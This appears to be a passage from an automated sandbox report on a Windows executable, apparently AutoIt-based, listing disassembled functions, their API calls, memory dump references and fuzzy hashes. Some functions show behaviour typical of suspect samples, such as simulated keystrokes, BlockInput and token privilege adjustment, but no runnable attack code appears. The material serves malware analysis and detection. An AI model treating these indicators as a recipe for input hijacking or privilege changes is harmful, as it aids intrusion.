                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35080
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00A35092
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5cc46cdb9ec225083415826b48040e3a1e87ba5ee2abd84c81078e42b07b1feb
                                                                                                                                                                                                                                                                                                    • Instruction ID: a4645032b73cc127bd0bcd519d0fa1309a6c17e82b0773cd17f5268f2c65b468
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc46cdb9ec225083415826b48040e3a1e87ba5ee2abd84c81078e42b07b1feb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BE0EC32400648EFCF25AFA8DE09E583B69EF52381F114414F88A9A972DB36DD43CBD0
                                                                                                                                                                                                                                                                                                    Function 00A6E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00A6E664
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0fd9724cad62ff69cc295522f8cd2e20b306369d0358eecce095f512aff37dd9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 55f40b49e41c89dbc54687e87da53dbc63855397377fd81c10dd5f81daca93c6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fd9724cad62ff69cc295522f8cd2e20b306369d0358eecce095f512aff37dd9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0D0C9B880112DEACB80CB90EC88DDA737CBB05304F100661F146E2040D73095498B20
                                                                                                                                                                                                                                                                                                    Function 00A841FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A952EE,?,?,00000035,?), ref: 00A84229
                                                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A952EE,?,?,00000035,?), ref: 00A84239
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6bb4e886fb449bc9743c1612090ba69205a2f3a6a1824cffc74a9c17dc13e036
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75cbe10dd07188deb9533e4923b004c683b0692b3abea7822dcef241002b538c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bb4e886fb449bc9743c1612090ba69205a2f3a6a1824cffc74a9c17dc13e036
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F0E5306043266AEB2067A59C4DFEF366DEFCA761F000175F505D21D1DA709945C7B1
                                                                                                                                                                                                                                                                                                    Function 00A7BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A7BC24
                                                                                                                                                                                                                                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00A7BC37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1803aec226465c5667fd168f1460f03998027520bec8ed46116bfcd3b71765a5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 771d0774309160343c5f9c82568f7930c9a5da5539586eb75ad675c7c9787a74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1803aec226465c5667fd168f1460f03998027520bec8ed46116bfcd3b71765a5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF01D7181424EABDB05DFA4C805BFE7BB4FF08309F04C409F955A6191D7798611DFA5
                                                                                                                                                                                                                                                                                                    Function 00A71A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A71B48), ref: 00A71A20
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00A71B48), ref: 00A71A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 651f9a060002fbbaa158dbe2f22a8bb3ab4b93aa7739d43c91e111d7624d816e
                                                                                                                                                                                                                                                                                                    • Instruction ID: c54a08dec20554b6f86900a36b6ab5fd192becabdc1a906f6eb0b56eff082ca9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 651f9a060002fbbaa158dbe2f22a8bb3ab4b93aa7739d43c91e111d7624d816e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51E04F72004611AFE7252B50FC05F73B7E9EB04310F14891DF496808B0DB626C91DB10
                                                                                                                                                                                                                                                                                                    Function 00A8F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00A8F51A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7970bda0f50c164382ec4c82857d51d9fd840810ebe880862e645a7ad4b8697b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 18a16c59dafd5af6369b6db27d94b399fda4f0d0f65c2445904a6314c2854421
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7970bda0f50c164382ec4c82857d51d9fd840810ebe880862e645a7ad4b8697b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAE04F322102159FCB10EF69D804A9AF7E8AFA4761F048426FC8AC7351DB70F9818BA1
                                                                                                                                                                                                                                                                                                    Function 00A7EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A7ECC7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: db94bcce7102f295ca0d43f9e3c9647e590ee3fecca63b2240f470b7bb833f79
                                                                                                                                                                                                                                                                                                    • Instruction ID: f8ad56beb8492801e85c155518382f54ef903611afe2f908ac52a439a3452a0f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db94bcce7102f295ca0d43f9e3c9647e590ee3fecca63b2240f470b7bb833f79
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD05BBE15410138E41FC73D4E1FB761509E709741F44C6C9B20AC56D8E5D19D009061
                                                                                                                                                                                                                                                                                                    Function 00A30D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A3075E), ref: 00A30D4A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 118e59df1a42ae2a7a7f2df6f2d3fdaf861808b0f8e62235eab67a0204fc73b8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0dcb3cd86873369624edf1418ec6cc3ee3757c72450807f2d64e4648cc179595
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118e59df1a42ae2a7a7f2df6f2d3fdaf861808b0f8e62235eab67a0204fc73b8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                    Function 00A9353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00A9358D
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00A935A0
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00A935AF
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A935CA
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A935D1
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A93700
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A9370E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93755
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00A93761
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A9379D
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937BF
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937D2
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937DD
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A937E6
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937F5
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A937FE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93805
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00A93810
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93822
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AB0C04,00000000), ref: 00A93838
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00A93848
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A9386E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A9388D
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A938AF
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93A9C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7c3d30bc5d3c1164c344cd6f1fb6c2b04f115ee3c2c6095349adbcb327d62cd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5213b6a9ceb1b83b9d403a21aa5d877727ac6265dbf74a3c318bb7f67336092f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c3d30bc5d3c1164c344cd6f1fb6c2b04f115ee3c2c6095349adbcb327d62cd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1026F72600215AFDF14DFA4CD89EAE7BB9FB49310F048158F9569B2A0DB74AD41CF60
                                                                                                                                                                                                                                                                                                    Function 00AA7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00AA7B67
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AA7B98
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AA7BA4
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00AA7BBE
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00AA7BCD
                                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00AA7BF8
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 00AA7C00
                                                                                                                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00AA7C07
                                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00AA7C16
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA7C1D
                                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00AA7C68
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00AA7C9A
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA7CBC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(00000012), ref: 00AA7E5B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SetTextColor.GDI32(?,00AA7B2D), ref: 00AA7E5F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColorBrush.USER32(0000000F), ref: 00AA7E75
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(0000000F), ref: 00AA7E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(00000011), ref: 00AA7E9D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AA7EAB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SelectObject.GDI32(?,00000000), ref: 00AA7EBC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SetBkColor.GDI32(?,?), ref: 00AA7EC5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SelectObject.GDI32(?,?), ref: 00AA7ED2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AA7EF1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AA7F08
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AA7F15
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c18215b4c4b496acc80c63c447d918b005d01b01dba45c6acb77fbc9f31630a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 818df5ece6d054aed58d77712d51c21a63ed2bfeaa9aa6c90162dd453411df8c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c18215b4c4b496acc80c63c447d918b005d01b01dba45c6acb77fbc9f31630a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFA16C72408302AFDB11DFA4DC48A6FBBA9FB4A324F100A19F9A3965E0D771D946CB51
                                                                                                                                                                                                                                                                                                    Function 00A11625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00A116B4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A52B07
